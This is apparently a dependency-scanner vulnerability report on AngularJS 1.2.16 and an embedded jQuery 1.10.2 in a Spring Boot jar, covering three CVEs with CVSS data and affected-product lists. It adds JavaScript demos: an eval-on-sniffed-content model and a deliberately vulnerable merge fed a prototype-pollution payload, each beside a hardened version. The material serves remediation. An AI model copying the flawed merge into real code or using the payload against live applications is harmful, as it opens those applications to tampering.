MD5: 1d53670898c93b57ca3c9e42eb19bece
SHA1: 4cb4e863424b99a4b77e4bbd71965c02eb4bc950
SHA256: 5a2f1ad5285644bffbe32058950359e51c2c8693bd0a30e811acbcc97dc9937c
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-scenario.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/angular-scenario.js
MD5: 3f2aaf7bf49592919bdec2394f6eafb3
SHA1: 320b4aa0cb282267fcae967a109bf6bedb500d1b
SHA256: d65ab66625aaf21f6f78bb577a81e21210919c6a3271d388ddbc90ffae71040b
Evidence:
Type     Source  Name     Value      Confidence
Vendor   file    name     angularjs  High
Vendor   file    name     jquery     High
Product  file    name     angularjs  High
Product  file    name     jquery     High
Version  file    version  1.10.2     High
Version  file    version  1.2.16     High
CVE-2019-10768
In AngularJS before 1.7.9 the function `merge()` could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3: Base Score: HIGH (7.5)  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0)  Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References: (none listed)
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.7.9

CVE-2015-9251
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
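The jQuery evidence on this file comes from the copy of jQuery 1.10.2 that angular-scenario.js (AngularJS's end-to-end test runner) embeds, so the CVE applies to the application even though no jquery webjar is declared; the file ships because the whole angularjs webjar is packaged into BOOT-INF/lib. What the finding means in practice is shown below with an added example. It is not code from the report or from jQuery: it models jQuery's pre-3.0 "intelligent guess" of the response type from the Content-Type header when dataType is omitted, beside the behaviour jQuery 3.0.0 adopted for cross-domain requests (a script response is only executed when the caller explicitly asked for dataType 'script' or 'jsonp'). The response object, the header sniffing and the attacker payload are constructed for the example; no network request is made.

```javascript
// Added example for CVE-2015-9251. Not code from the Dependency-Check report or
// from jQuery: a small model of the behaviour the CVE describes. jQuery < 3.0.0
// guessed the response type from Content-Type when the caller omitted dataType,
// and a "script" guess meant the body was evaluated, even for a cross-domain
// request. jQuery 3.0.0 stopped auto-executing cross-domain script responses
// unless dataType is explicitly 'script' (or 'jsonp').

// Constructed stand-in for an XHR response (no real network call).
function makeResponse(contentType, body) {
  return { headers: { 'content-type': contentType }, body };
}

// Content-Type sniffing, in the spirit of jQuery's "intelligent guess".
function sniffDataType(contentType) {
  if (/\b(?:java|ecma)script\b/i.test(contentType)) return 'script';
  if (/\bjson\b/i.test(contentType)) return 'json';
  if (/\bxml\b/i.test(contentType)) return 'xml';
  return 'text';
}

// Converts the body according to the resolved dataType. 'script' means the
// body is run as code; indirect eval is used here, roughly what globalEval does.
function convertBody(dataType, body) {
  switch (dataType) {
    case 'script': return (0, eval)(body);
    case 'json':   return JSON.parse(body);
    default:       return body;
  }
}

// Pre-3.0 behaviour: no dataType means the server's Content-Type is trusted
// entirely. A cross-domain server answering text/javascript gets code execution.
function handleResponseLegacy(response, options) {
  const type = options.dataType || sniffDataType(response.headers['content-type']);
  return convertBody(type, response.body);
}

// 3.0.0 behaviour (simplified): a script response from another origin is only
// executed when the caller opted in with dataType 'script' or 'jsonp';
// otherwise the body is handed back as plain text.
function handleResponseHardened(response, options) {
  const type = options.dataType || sniffDataType(response.headers['content-type']);
  const optedIn = options.dataType === 'script' || options.dataType === 'jsonp';
  if (type === 'script' && options.crossDomain && !optedIn) {
    return convertBody('text', response.body);
  }
  return convertBody(type, response.body);
}

// Runs both handlers against a constructed attacker response and reports
// whether the payload executed. Removes the global the payload sets.
function demo() {
  const payload = "globalThis.__cve_2015_9251 = 'executed'; 'script ran'";
  const evil = makeResponse('text/javascript; charset=utf-8', payload);
  const opts = { crossDomain: true };            // no dataType, as in the CVE

  const legacyResult = handleResponseLegacy(evil, opts);
  const legacyExecuted = globalThis.__cve_2015_9251 === 'executed';
  delete globalThis.__cve_2015_9251;

  const hardenedResult = handleResponseHardened(evil, opts);
  const hardenedExecuted = globalThis.__cve_2015_9251 === 'executed';
  delete globalThis.__cve_2015_9251;

  return { legacyResult, legacyExecuted, hardenedResult, hardenedExecuted };
}
```

For the pinned 1.10.2 copy, where upgrading the webjar is the real fix, the workaround the model also shows is to always pass an explicit dataType on cross-domain calls: with dataType 'json', a text/javascript body fails in JSON.parse and surfaces as an error instead of running.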
CVSSv3: Base Score: MEDIUM (6.1)  Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3)  Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
http://research.insecurelabs.org/jquery/test/
https://bugs.jquery.com/ticket/11974
https://github.com/advisories/GHSA-rmxg-73gg-4p98
https://github.com/jquery/jquery/issues/2432
https://nvd.nist.gov/vuln/detail/CVE-2015-9251
Further NVD references from cve@mitre.org and af854a3a-2127-422b-91ae-364da2661108 appear in the report without URLs; their tags are ISSUE_TRACKING, PATCH, THIRD_PARTY_ADVISORY, US_GOVERNMENT_RESOURCE and VDB_ENTRY.
Vulnerable Software & Versions (NVD):
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.0.0
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:* versions up to (excluding) 7.0.0.1
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:* versions up to (excluding) 6.1.0.4.0
cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:* versions up to (excluding) 7.2
cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.6
cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6
cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.1; versions up to (including) 17.12
cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:*
cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:*
cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:* versions from (including) 4.3.0.1; versions up to (including) 4.3.0.4
cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*

CVE-2019-11358
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
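CVE-2019-10768 (AngularJS `merge()`) and CVE-2019-11358 (`jQuery.extend(true, {}, ...)`) are the same class of defect: a recursive merge that, handed a source object with an own property literally named `__proto__`, resolves that key on the target to `Object.prototype` and writes the attacker's keys onto it, so every object in the page's JavaScript realm acquires them. Such a source object is exactly what `JSON.parse` produces from a request body or URL parameter containing `{"__proto__": {...}}`. The following is an added example that covers both findings; it is not code from the report, from AngularJS or from jQuery. It shows a minimal deep merge with the same flaw beside a hardened version, plus a check for whether `Object.prototype` has been polluted. The attacker payload and the function names are constructed for the example.

```javascript
// Added example for CVE-2019-10768 (AngularJS merge()) and CVE-2019-11358
// (jQuery.extend(true, {}, ...)). Not code from the report, AngularJS or jQuery:
// a minimal recursive merge with the same flaw, a hardened version, and a
// check for whether Object.prototype has been polluted.

// Vulnerable pattern: recurse into any object-valued property by key name.
// When src carries an own property literally named "__proto__" (JSON.parse
// creates one from '{"__proto__": {...}}'), dst["__proto__"] resolves to
// Object.prototype and the recursion writes the attacker's keys onto it.
function deepMergeVulnerable(dst, src) {
  for (const key in src) {
    const value = src[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (dst[key] === null || typeof dst[key] !== 'object') dst[key] = {};
      deepMergeVulnerable(dst[key], value);
    } else {
      dst[key] = value;
    }
  }
  return dst;
}

// Keys that can reach a shared prototype through ordinary property access.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Only plain objects are merged recursively; class instances, functions and
// arrays are assigned as values.
function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Hardened merge: own keys only, forbidden names skipped, and the recursion
// target is always an own plain-object property of dst, never something
// inherited from its prototype chain.
function deepMergeHardened(dst, src) {
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = src[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(dst, key) || !isPlainObject(dst[key])) {
        dst[key] = {};
      }
      deepMergeHardened(dst[key], value);
    } else {
      dst[key] = value;
    }
  }
  return dst;
}

// Detection helper: has `name` been written onto Object.prototype?
function isPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Runs a constructed attacker payload through both merges and reports the
// outcome. Removes the polluted property after the vulnerable merge so the
// rest of the process is unaffected.
function demo() {
  const attackerJson = '{"name":"guest","__proto__":{"isAdmin":true}}';

  deepMergeVulnerable({}, JSON.parse(attackerJson));
  const vulnerablePolluted = isPrototypePolluted('isAdmin');
  const unrelatedObjectIsAdmin = ({}).isAdmin === true;   // every object "became admin"
  delete Object.prototype.isAdmin;

  const merged = deepMergeHardened({ role: 'user' }, JSON.parse(attackerJson));
  const hardenedPolluted = isPrototypePolluted('isAdmin');

  return { vulnerablePolluted, unrelatedObjectIsAdmin, hardenedPolluted, merged };
}
```

The `isPrototypePolluted` check is the cheapest post-incident test: if a property like `isAdmin` or `__proto__`-delivered config key is an own property of `Object.prototype`, something in the page merged untrusted input. Fixing the library version is still the remedy; the hardened merge only shows what the fixed versions enforce.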
CVSSv3: Base Score: MEDIUM (6.1)  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3)  Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
Further NVD references from cve@mitre.org and af854a3a-2127-422b-91ae-364da2661108 appear in the report without URLs; their tags are BROKEN_LINK, EXPLOIT, ISSUE_TRACKING, MAILING_LIST, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY, VDB_ENTRY and VENDOR_ADVISORY.
Vulnerable Software & Versions (NVD):
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.11.0; versions up to (excluding) 1.11.9 cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.12.0; versions up to (excluding) 1.12.6 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.66 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.5.0; versions up to (excluding) 8.5.15 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (excluding) 8.6.15 cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (including) 3.9.4 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 19.1 cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.0; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* 
